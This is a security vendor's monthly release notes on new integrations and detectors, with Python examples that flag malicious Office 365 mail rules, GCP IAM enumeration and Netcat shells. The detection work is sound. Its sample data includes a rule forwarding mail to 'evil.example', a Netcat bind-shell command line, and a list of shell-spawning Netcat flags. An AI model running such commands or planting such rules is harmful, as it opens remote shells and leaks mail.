August 2023 (2)


Product updates

Threat Clustering Official Release

We’re glad to inform you that Hunters’ improved Threat Clustering abilities are now officially released to all customers!

📘 About the Threat Clustering concept

Security teams spend enormous amounts of time triaging, investigating, and managing hundreds of alerts each day, many of which are identical or share a root cause, resulting in inefficient and often frustrating triage work.

Threat Clustering is a threat-centric approach for grouping, investigating, managing, and analyzing leads based on similarities in malicious intent, impact, and/or context. By reducing the Time-to-Triage and Time-to-Know, security teams will be able to scope and mitigate attacks more quickly, using lessons learned from previous investigations and mitigation steps of similar past events.

To learn more about this:

IOC Search Enhancements

The IOC Search now supports the following data types:

  • 1Password: onepassword-audit-events, onepassword-item-usages-logs, onepassword-sign-in-logs
  • Microsoft 365: microsoft-365-defender-alert-evidence, microsoft-365-defender-alert-info
  • Agari: agari-phishing-defense-messages, agari-phishing-defense-policy-events
  • Microsoft Azure: azure-active-directory-users
  • Atlassian: confluence-audit-logs, jira-audit-logs
  • Mimecast: mimecast-attachment-protect-logs, mimecast-av-logs, mimecast-delivery-logs, mimecast-impersonation-protect-logs, mimecast-internal-email-protect-logs, mimecast-process-logs, mimecast-receipt-logs, mimecast-spam-event-thread-logs, mimecast-url-protect-logs
  • AWS: aws-config, aws-elb-classic, aws-inspector-findings, aws-waf, aws-guard-duty, route53-resolver-query-logs, aws-s3-server-access-logs
  • Office 365: O365-audit-logs
  • Cisco: cisco-asa-firewall, cisco-ftd-firewall, cisco-ftd-impact-flag-logs
  • Okta: okta-apps, okta-groups, okta-users
  • CrowdStrike: crowdstrike-detects, crowdstrike-devices, crowdstrike-incidents
  • Orca: orca-alerts
  • GCP: gcp-audit, gcp-security-command-center-assets, gcp-security-command-center-findings
  • Wiz: wiz-events
  • Google Workspace: gsuite-alert, gsuite-directory-users
  • Zscaler: zscaler-zpa-app-connector-status, zscaler-zpa-audit, zscaler-zpa-browser-access, zscaler-zpa-user-activity, zscaler-zpa-user-status, zscaler-zia, zscaler-zia-dns, zscaler-zia-firewall
  • Meraki: meraki-clients, meraki-clients-traffic (ip/domain), meraki-security-events

Integrations

Seraphic Security

Seraphic is a browser security solution that protects enterprise assets and provides security teams with advanced governance and policy enforcement.

Integrating Seraphic with Hunters allows the collection and ingestion of its data, as well as using that data for alerts and security content in the Hunters platform.

The new integration includes:

  • a puller for the Events and Alerts endpoints
  • transformation of the data to Snowflake
  • native alert written over the new data
  • mapping of the Events data to Login Unified Schema

Learn more here

AWS RDS Aurora

Amazon Aurora MySQL is a fully managed, MySQL-compatible, relational database engine that combines the speed and reliability of high-end commercial databases with the simplicity and cost-effectiveness of open-source databases. Amazon RDS provides administration for Aurora by handling routine database tasks such as provisioning, patching, backup, recovery, failure detection, and repair.

The new integration includes a transformer for the RDS data.

Learn more here

Azure AD Identity Protection

Hunters now supports a new Azure AD data type: the risk detection reports produced by Azure AD Identity Protection.

The integration includes:

  • collection via Graph API
  • transformation of the data to Snowflake
  • native alert written over the new data
  • IOC Search over this data

Learn more here

Palo Alto Networks XDR Raw Logs

Hunters now supports the ingestion of PAN XDR Raw Logs. The raw data is mapped to 8 different unified schemas, and multiple detections will run over it.

The raw data integration is only supported for data exported to AWS buckets.

Learn more here

Harness IO

Harness is a Software Delivery Platform that uses AI to simplify DevOps processes - CI, CD & GitOps, Feature Flags, Cloud Costs.

Integrating the Harness product with Hunters allows ingestion of its data, as well as consuming Hunters' supported detection and investigation content over the source.

This integration includes:

  • a transformer for the Harness Audit Logs
  • mapping of the events to the Login Unified Schema

Learn more here

Very Good Security

Very Good Security (VGS), a data vault product, is now supported by Hunters. VGS enables you to use your sensitive data without needing to store and secure the underlying data yourself, while retaining its full utility and value.

The new integration includes a transformer for the Very Good Security Events.

Learn more here

Solarwinds Orion

Hunters now supports the ingestion of Solarwinds Orion, an infrastructure monitoring and management platform designed to simplify IT administration for on-premises, hybrid, and software as a service (SaaS) environments in a single pane of glass.

The new integration includes:

  • a transformer for the Solarwinds Orion Logs
  • mapping of the events to the Login Unified Schema

Learn more here

Detection

Office 365 Detection Pack

Office 365 provides various services and applications that increase collaboration within enterprises. It is very popular worldwide, and its most commonly used services are email and data sharing.

The threats on these platforms are varied: financial fraud, data exfiltration, and ransom. When such a threat involves the email service, the attack is typically referred to as Business Email Compromise (BEC); when the victim is a private person or a very small organization, it may be referred to as Email Account Compromise (EAC).

According to the FBI's 2021 report, BEC/EAC is among the most common threats in the US, with annual losses of $2.4B (~$7M per day) in the US alone.

In this detection pack, we aim to provide a comprehensive list of detectors that cover a significant part of the common threats on Office 365.

Office 365 Suspicious Transport Rule Created

Malicious actors may create Exchange transport rules in order to gain persistent access to an organization's emails. Transport rules notify neither the sender nor the recipient when an action is applied to a message, which makes them a quiet way to exfiltrate data or to drop specific emails. Rule conditions and actions are highly granular, which leaves attackers plenty of room to be creative.

This new detector catches the creation and manipulation of Exchange transport rules.

Possible Hiding of Incoming Emails using Inbox Rule

Actors create inbox rules that move incoming emails to alternative folders (e.g. the RSS Feeds folder) instead of the Inbox. That way they hide incoming emails and can read them before the compromised user does, which enables seamless interception.

This new detector looks for New-InboxRule or Set-InboxRule operations in the Office 365 Unified Audit Log, focusing on three scenarios:

  • Delete emails: inbox rules that delete incoming emails under specific conditions (specific senders, specific words in the email subject, etc.).
  • Moving emails to ‘blackhole’ folders: inbox rules that move incoming emails to folders the compromised user won’t look at, e.g. “Deleted Items”, “Spam”, etc.
  • Moving emails to active folders but marking them as read: inbox rules that move incoming emails to folders the compromised user checks regularly, but mark them as read so they won’t catch the compromised user's attention.

Disablement of Office 365 Exchange Audit Log

Malicious actors may disable Exchange audit logging in order to evade detection or other defenses. Apart from the log record of the disablement itself, this technique may leave very little to detect afterwards, which makes this detection crucial. This new detector is designed to catch such activity.

Office 365 Forwarding Rules to Addresses Outside the Organization

This new detector catches the creation of forwarding rules in Office 365 that send email to addresses outside the organization. Such rules can be used to leak sensitive data.
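The three Exchange-rule detectors above (transport rules, inbox rules that hide mail, and forwarding to external addresses) all read the same Unified Audit Log record shape, so one classifier can serve them. The block below is an added example written for this page, not Hunters' detector logic: it flattens a record's `Parameters` array, tags the three hiding scenarios, extracts recipient addresses from the forwarding parameters of both inbox and transport rules, and reports any whose domain is not in a caller-supplied set of internal domains. The `BLACKHOLE_FOLDERS` list, the `example.com` internal domain, and the sample records are constructed assumptions.

```python
import json
import re

# Folders a compromised user rarely looks at (assumed list; extend for other mailbox languages)
BLACKHOLE_FOLDERS = {"deleted items", "junk email", "junk e-mail", "rss feeds",
                     "rss subscriptions", "archive", "conversation history"}
INBOX_RULE_OPS = {"new-inboxrule", "set-inboxrule"}
TRANSPORT_RULE_OPS = {"new-transportrule", "set-transportrule"}
RECIPIENT_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",   # inbox rule actions
                    "BlindCopyTo", "RedirectMessageTo", "CopyTo")         # transport rule actions
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def parameters(record):
    """Flatten the UAL 'Parameters' array ([{Name, Value}, ...]) into a dict of strings."""
    return {p["Name"]: str(p.get("Value", "")) for p in record.get("Parameters", [])}


def is_true(value):
    return value.strip().lower() in {"true", "$true", "1"}


def external_recipients(value, internal_domains):
    """Addresses in a recipient parameter whose domain is not one of ours. The UAL renders
    recipients in several shapes ('a@b.c', 'Name [SMTP:a@b.c]', lists), so a regex over the
    raw string covers all of them."""
    return [addr for addr in EMAIL_RE.findall(value)
            if addr.rsplit("@", 1)[1].lower() not in internal_domains]


def classify(record, internal_domains):
    """Return finding tags for one audit record; an empty list means no lead."""
    op = record.get("Operation", "").lower()
    if op not in INBOX_RULE_OPS | TRANSPORT_RULE_OPS:
        return []
    p = parameters(record)
    findings = []
    if is_true(p.get("DeleteMessage", "")):
        findings.append("delete_incoming")            # scenario 1: silently delete
    folder = p.get("MoveToFolder", "").strip("\\ ").lower()
    if folder in BLACKHOLE_FOLDERS:
        findings.append("move_to_blackhole")          # scenario 2: park in an unwatched folder
    elif folder and is_true(p.get("MarkAsRead", "")):
        findings.append("move_and_mark_read")         # scenario 3: active folder, but pre-read
    for name in RECIPIENT_PARAMS:
        for addr in external_recipients(p.get(name, ""), internal_domains):
            findings.append(f"external_forward:{name}:{addr}")
    if op in TRANSPORT_RULE_OPS and findings:
        findings.insert(0, "transport_rule")          # tenant-wide and invisible to sender/recipient
    return findings


def triage(ual_lines, internal_domains):
    """Run classify() over raw JSON lines; return (UserId, Operation, findings) for hits."""
    hits = []
    for line in ual_lines:
        record = json.loads(line)
        findings = classify(record, internal_domains)
        if findings:
            hits.append((record.get("UserId"), record.get("Operation"), findings))
    return hits


# Constructed sample records (not real tenant data) in the UAL Exchange admin-audit shape.
SAMPLE_UAL = [
    json.dumps({"Operation": "New-InboxRule", "UserId": "cfo@example.com", "Parameters": [
        {"Name": "Name", "Value": "."}, {"Name": "From", "Value": "bank@partner.example"},
        {"Name": "MoveToFolder", "Value": "RSS Feeds"}, {"Name": "MarkAsRead", "Value": "True"}]}),
    json.dumps({"Operation": "Set-InboxRule", "UserId": "cfo@example.com", "Parameters": [
        {"Name": "Identity", "Value": "Invoices"}, {"Name": "SubjectContainsWords", "Value": "invoice;wire"},
        {"Name": "DeleteMessage", "Value": "True"}]}),
    json.dumps({"Operation": "New-InboxRule", "UserId": "cfo@example.com", "Parameters": [
        {"Name": "Name", "Value": "fwd"}, {"Name": "ForwardTo", "Value": "Ops [SMTP:ops@evil.example]"}]}),
    json.dumps({"Operation": "New-TransportRule", "UserId": "admin@example.com", "Parameters": [
        {"Name": "Name", "Value": "Compliance copy"},
        {"Name": "BlindCopyTo", "Value": "archive@mail-backup.example"}]}),
    json.dumps({"Operation": "New-InboxRule", "UserId": "dev@example.com", "Parameters": [
        {"Name": "Name", "Value": "Jira"}, {"Name": "MoveToFolder", "Value": "Projects"}]}),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_UAL, {"example.com"}):
        print(hit)
```

The last sample record (a rule that moves Jira mail to a "Projects" folder without marking it read) produces no finding, which is the false-positive class a production detector has to tolerate; tuning in practice is mostly about the folder list and the internal-domain set.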

Time Series Detection

Time series detectors are used to detect anomalies and potential threats in network traffic or other types of data over time. Read about additions made to this type of detection:

GCP IAM Roles Enumeration Using GetIAMPolicy

Unlike some other cloud vendors, GCP has no single place to see who holds which role across the organization. Instead, IAM policies (bindings of users, service accounts, or groups to roles) are attached directly to resources. To find out who has access to a particular resource, and with which permissions, a user has to call the GetIamPolicy method on that resource.

GetIamPolicy is a legitimate GCP API call that returns the IAM policy of a specified resource. An attacker who compromises a GCP identity may aggressively enumerate the IAM policies attached to other resources, looking for misconfigurations that grant broader access or allow lateral movement within the GCP environment.

Because of how GCP IAM works, this step is almost mandatory in a GCP attack chain, so we expect this detector to be an important baseline for catching both red-team activity and true-positive incidents in GCP.
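To make the time-series idea concrete, here is an added example (written for this page, not Hunters' detector) that buckets GetIamPolicy calls from gcp-audit entries per principal in 10-minute windows and alerts when a bucket's call count is a z-score spike over that principal's own earlier buckets and touches many distinct resources. The bucket width, the `MIN_CALLS`/`MIN_DISTINCT`/`Z_THRESHOLD` gates, the principal names, and the generated log lines are all constructed assumptions; the `methodName` suffix match is there because the method is spelled differently per service (`GetIamPolicy`, `storage.buckets.getIamPolicy`, and so on).

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev

BUCKET_SECONDS = 600     # assumed bucket width
MIN_CALLS = 20           # assumed floor: never alert on a handful of calls
MIN_DISTINCT = 10        # assumed: enumeration spreads across many resources
MIN_HISTORY = 3          # assumed: need a few earlier buckets before judging a spike
Z_THRESHOLD = 3.0


def parse_entry(line):
    """Return (principal, epoch_seconds, resource) for a GetIamPolicy audit entry, else None."""
    entry = json.loads(line)
    payload = entry.get("protoPayload", {})
    if not payload.get("methodName", "").lower().endswith("getiampolicy"):
        return None
    ts = datetime.fromisoformat(entry["timestamp"].replace("Z", "+00:00")).timestamp()
    return payload["authenticationInfo"]["principalEmail"], ts, payload.get("resourceName", "")


def build_series(lines):
    """principal -> {bucket_index: [call_count, {distinct resources}]}"""
    series = defaultdict(lambda: defaultdict(lambda: [0, set()]))
    for line in lines:
        parsed = parse_entry(line)
        if parsed is None:
            continue
        principal, ts, resource = parsed
        slot = series[principal][int(ts // BUCKET_SECONDS)]
        slot[0] += 1
        slot[1].add(resource)
    return series


def detect(lines):
    """Return (principal, bucket_start_utc, calls, distinct_resources, z) for spike buckets.
    The baseline for a bucket is all of that principal's earlier buckets (expanding window);
    empty buckets are not back-filled with zeros, which is a simplification."""
    alerts = []
    for principal, buckets in build_series(lines).items():
        history = []
        for idx in sorted(buckets):
            calls, resources = buckets[idx]
            if len(history) >= MIN_HISTORY:
                mu, sigma = mean(history), pstdev(history)
                z = (calls - mu) / sigma if sigma else (float("inf") if calls > mu else 0.0)
                if calls >= MIN_CALLS and len(resources) >= MIN_DISTINCT and z >= Z_THRESHOLD:
                    start = datetime.fromtimestamp(idx * BUCKET_SECONDS, tz=timezone.utc)
                    alerts.append((principal, start.isoformat(), calls, len(resources), round(z, 1)))
            history.append(calls)
    return alerts


def build_sample_log():
    """Constructed gcp-audit lines: a deployer making 2 calls per bucket, and a compromised
    service account that is quiet for five buckets and then enumerates 40 resources."""
    t0 = datetime(2023, 8, 1, 9, 0, tzinfo=timezone.utc)
    lines = []

    def entry(minutes, principal, resource):
        stamp = (t0 + timedelta(minutes=minutes)).isoformat().replace("+00:00", "Z")
        lines.append(json.dumps({"timestamp": stamp, "protoPayload": {
            "methodName": "GetIamPolicy",
            "authenticationInfo": {"principalEmail": principal},
            "resourceName": resource}}))

    deployer = "deployer@proj.iam.gserviceaccount.com"
    compromised = "compromised@proj.iam.gserviceaccount.com"
    for b in range(6):
        for i in range(2):
            entry(b * 10 + i, deployer, f"projects/proj/buckets/b{i}")
    for b in range(5):                      # 1 or 2 calls per bucket, all against the project
        entry(b * 10 + 3, compromised, "projects/proj")
        if b in (1, 3):
            entry(b * 10 + 4, compromised, "projects/proj")
    for i in range(40):                     # then a burst across 40 distinct resources
        entry(50 + i % 10, compromised, f"projects/proj/resource-{i}")
    return lines


if __name__ == "__main__":
    for alert in detect(build_sample_log()):
        print(alert)
```

The deployer's steady two calls per bucket never alerts because its variance is zero and its count never exceeds its mean, while the compromised account's burst is both far above its own baseline and spread over many resources. In production the baseline would come from a longer history (days, not an hour) and the distinct-resource gate is what separates enumeration from a tight loop re-reading one policy.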

Detection Improvements

We’ve made the following improvements to existing detectors and detection-related items:

Office 365 operations per session ID

When exploring Office365-related detectors, you’ll now be able to drill down into the operations made by an Office365 session ID.


Suspicious Execution from %ProgramData%

As part of our noise reduction efforts, we’ve made significant improvements to the Suspicious Execution from %ProgramData% detector. These changes follow an analysis of the most common false-positive initiating processes across our customers’ data.
They should reduce the total number of leads for this detector by about 50%.

Execution of Netcat

After an alert from our content quality system, we revisited the ‘Execution of Netcat’ detector and adjusted its lead-creation logic.
Re-evaluating the thesis, we decided to create a lead only for executions of the Netcat command with specific flags, rather than for any execution.

The research yielded the following flags:

Execution flags (spawn a program on the connection):
  • -e, --exec
  • -c, --sh-exec
  • --lua-exec

Telnet flag:
  • -t, --telnet

Flags often used by red teams (listener setup):
  • -lvp
  • -nlvp

Based on these changes, the amount of noise is expected to drop significantly.
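The flag list above is easy to state and easy to get wrong in a detector: `-nlvp` is four flags in one token, `--sh-exec=bash` carries its argument with an equals sign, and `-e` on an unrelated binary such as `curl` must not match. The block below is an added example written for this page (not the Hunters detector) of a command-line check that handles those cases. It generalizes the two listed listener strings to any short-flag cluster containing `l`, `v` and `p` together; that generalization, the `NC_BINARIES` set, and the sample command lines are assumptions.

```python
import os
import shlex

NC_BINARIES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}   # assumed
EXEC_LONG = {"--exec", "--sh-exec", "--lua-exec"}   # spawn a program on the connection
EXEC_SHORT = {"e", "c"}
TELNET_LONG = {"--telnet"}
TELNET_SHORT = {"t"}
LISTENER_LETTERS = {"l", "v", "p"}                   # -lvp / -nlvp style listeners


def suspicious_netcat_flags(cmdline):
    """Return the sorted flag categories found ('exec', 'listener', 'telnet');
    an empty list means the execution should not create a lead."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                 # unbalanced quotes: fall back to whitespace split
        argv = cmdline.split()
    if not argv or os.path.basename(argv[0]) not in NC_BINARIES:
        return []
    hits = set()
    for token in argv[1:]:
        if token == "--":              # end of options; the rest are host/port arguments
            break
        if token.startswith("--"):
            name = token.split("=", 1)[0]
            if name in EXEC_LONG:
                hits.add("exec")
            elif name in TELNET_LONG:
                hits.add("telnet")
        elif token.startswith("-") and len(token) > 1:
            letters = set(token[1:])   # a cluster such as 'nlvp' is several flags at once
            if letters & EXEC_SHORT:
                hits.add("exec")
            if letters & TELNET_SHORT:
                hits.add("telnet")
            if LISTENER_LETTERS <= letters:
                hits.add("listener")
    return sorted(hits)


if __name__ == "__main__":
    # Constructed sample command lines
    for cmd in ("nc -zv 10.0.0.5 22-80", "nc -nlvp 4444 -e /bin/sh",
                "ncat --sh-exec=bash 10.0.0.5 443", "/bin/nc.traditional -t -v host.example 23"):
        print(f"{cmd!r:50} -> {suspicious_netcat_flags(cmd)}")
```

A plain port scan (`nc -zv ...`) produces no lead, which is the kind of benign execution the change is meant to stop alerting on, while a bind shell (`-nlvp 4444 -e /bin/sh`) is tagged both as a listener and as an exec.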